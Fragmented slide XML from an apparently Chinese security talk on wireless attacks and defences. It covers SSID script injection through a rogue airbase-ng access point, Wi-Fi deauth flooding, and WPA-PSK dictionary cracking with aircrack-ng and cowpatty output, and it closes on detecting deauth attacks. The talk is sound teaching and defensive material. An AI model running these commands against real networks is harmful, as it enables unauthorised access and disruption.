                  <a:pt x="61" y="69"/>
                  <a:pt x="64" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="71" y="67"/>
                  <a:pt x="73" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="49"/>
                  <a:pt x="86" y="49"/>
                  <a:pt x="86" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="49"/>
                  <a:pt x="120" y="49"/>
                  <a:pt x="120" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="49"/>
                  <a:pt x="128" y="52"/>
                  <a:pt x="128" y="57"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="36" y="85"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="83"/>
                  <a:pt x="34" y="81"/>
                  <a:pt x="32" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="81"/>
                  <a:pt x="28" y="83"/>
                  <a:pt x="28" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="109"/>
                  <a:pt x="28" y="109"/>
                  <a:pt x="28" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="111"/>
                  <a:pt x="30" y="113"/>
                  <a:pt x="32" y="113"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="113"/>
                  <a:pt x="36" y="111"/>
                  <a:pt x="36" y="109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36" y="85"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="52" y="85"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="83"/>
                  <a:pt x="50" y="81"/>
                  <a:pt x="48" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="81"/>
                  <a:pt x="44" y="83"/>
                  <a:pt x="44" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="109"/>
                  <a:pt x="44" y="109"/>
                  <a:pt x="44" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="111"/>
                  <a:pt x="46" y="113"/>
                  <a:pt x="48" y="113"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="113"/>
                  <a:pt x="52" y="111"/>
                  <a:pt x="52" y="109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52" y="85"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="68" y="85"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="83"/>
                  <a:pt x="66" y="81"/>
                  <a:pt x="64" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="81"/>
                  <a:pt x="60" y="83"/>
                  <a:pt x="60" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="109"/>
                  <a:pt x="60" y="109"/>
                  <a:pt x="60" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="111"/>
                  <a:pt x="62" y="113"/>
                  <a:pt x="64" y="113"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="113"/>
                  <a:pt x="68" y="111"/>
                  <a:pt x="68" y="109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68" y="85"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="85"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="83"/>
                  <a:pt x="82" y="81"/>
                  <a:pt x="80" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="81"/>
                  <a:pt x="76" y="83"/>
                  <a:pt x="76" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="109"/>
                  <a:pt x="76" y="109"/>
                  <a:pt x="76" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="111"/>
                  <a:pt x="78" y="113"/>
                  <a:pt x="80" y="113"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82" y="113"/>
                  <a:pt x="84" y="111"/>
                  <a:pt x="84" y="109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="85"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="100" y="85"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="83"/>
                  <a:pt x="98" y="81"/>
                  <a:pt x="96" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="94" y="81"/>
                  <a:pt x="92" y="83"/>
                  <a:pt x="92" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="109"/>
                  <a:pt x="92" y="109"/>
                  <a:pt x="92" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="111"/>
                  <a:pt x="94" y="113"/>
                  <a:pt x="96" y="113"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="113"/>
                  <a:pt x="100" y="111"/>
                  <a:pt x="100" y="109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="100" y="85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Bebas" pitchFamily="2" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="Bebas" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-263525"/>
            <a:ext cx="2033905" cy="203390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252730" y="2894330"/>
            <a:ext cx="697928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sudo airbase-ng -e "&lt;script&gt;alert('pwn')&lt;/script&gt;" -c 1 wlan0mon -v  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22:04:35  Created tap interface at0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22:04:35  Trying to set MTU on at0 to 1500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22:04:35  Trying to set MTU on wlan0mon to 1800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22:04:35  Access Point with BSSID 00:C0:CA:96:EC:E1 started.   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55650" y="1639570"/>
            <a:ext cx="677608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众多路由器或智能设备有有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Scan wifi list” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的功能，可对周边进行无线扫描，但对扫描到的数据却未做安全处理。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="tim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9020" y="3460750"/>
            <a:ext cx="4438015" cy="3397250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="ppt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935" y="4511675"/>
            <a:ext cx="7894955" cy="1714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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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9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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Kartika" panose="02020503030404060203" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SSID injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="Selection_00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9420" y="1464310"/>
            <a:ext cx="10058400" cy="535813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星, 户外艺术系列&#10;&#10;已生成高可信度的说明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376484" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3196303" y="2228840"/>
            <a:ext cx="5799455" cy="1430655"/>
            <a:chOff x="3010393" y="2258020"/>
            <a:chExt cx="6396456" cy="1577929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4709886" y="2258020"/>
              <a:ext cx="2772228" cy="10169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5400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Part 04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1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4" name="文本框 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3010393" y="3192311"/>
              <a:ext cx="6396456" cy="6436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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>无线攻击的识别与</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>防御策略</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1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0">
        <p15:prstTrans prst="fallOver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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="203390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67080" y="1705610"/>
            <a:ext cx="504825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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify DOS Atta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>k</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="3076575"/>
            <a:ext cx="8590915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DOS攻击有很多种，什么Authentiction Flood 、De-Authentcation Flood、Association Flood、Beacon Flood 等等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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Deauth Flood：这个在常见无线攻击中，是最常用的，应该也是最常见的，当Client对AP进行认证的时候，过程可以使用一些Radius、EAP等安全协议来认证Client，然后它们就连在一起了，这时候如果接收到Deauth的框架信息，就会与客户端分离.迫使再次重新连接进行拒绝服务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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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1922780" y="453390"/>
            <a:ext cx="531495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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>老旧的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1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49885" y="1584325"/>
            <a:ext cx="526097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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPA/WPA2-PSK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000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39445" y="2308225"/>
            <a:ext cx="1081087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A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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282575" y="1931670"/>
            <a:ext cx="11284585" cy="47999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Aircrack-ng 1.2 rc5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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[00:00:00] 3/2 keys tested (436.11 k/s)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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Time left: 0 seconds                                     150.00%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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KEY FOUND! [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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Master Key     : 68 16 DA 9E 72 22 6C 41 78 F4 79 D7 B5 9E C8 9E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C2 B5 B6 BA 38 98 5C 51 86 5B F6 96 B7 46 BA 31</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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Transient Key  : 1A 38 FC 8D CD 43 2C 19 27 4B 7D FC 86 70 19 6D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1A 8E D7 EA 49 D5 00 F0 F2 9F 4A 28 1C 33 D3 CE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1B 68 AD 0F F0 D6 9E 68 F8 0B AD 6E A6 AE 4A 4C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7E 8A 7A 35 6D 6D 1A 8B 1C 7F 8A 9C 40 26 5D E9</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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EAPOL HMAC     : 86 EB A9 02 C2 7B 80 35 16 18 C1 BB 68 DA 18 F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654165" y="1676400"/>
            <a:ext cx="41027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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加速的时代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000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654165" y="2202180"/>
            <a:ext cx="5154295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➜  ~ sudo cowpatty -d hash -r wpacrack.pcap -s Honey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cowpatty 4.6 - WPA-PSK dictionary attack. &lt;jwright@hasborg.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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Collected all necessary data to mount crack against WPA2/PSK passphrase.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Starting dictionary attack.  Please be patient.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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The PSK is "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>".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2 passphrases tested in 0.00 seconds:  50000.00 passphrases/second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654800" y="5802630"/>
            <a:ext cx="513207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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>速度为50000/秒，对比 aircrack-ng 自带破解速度相比：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash keys tested (436.11 k/s) 足足快了一百多倍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="203390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641350" y="1705610"/>
            <a:ext cx="678624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我们可以根据Management Frames的类型和Authentication报文进行检测Deauth：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="t01f778e93135b04b6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350" y="2418715"/>
            <a:ext cx="8342630" cy="41046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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="203390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612140" y="1666875"/>
            <a:ext cx="519366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solidFill>
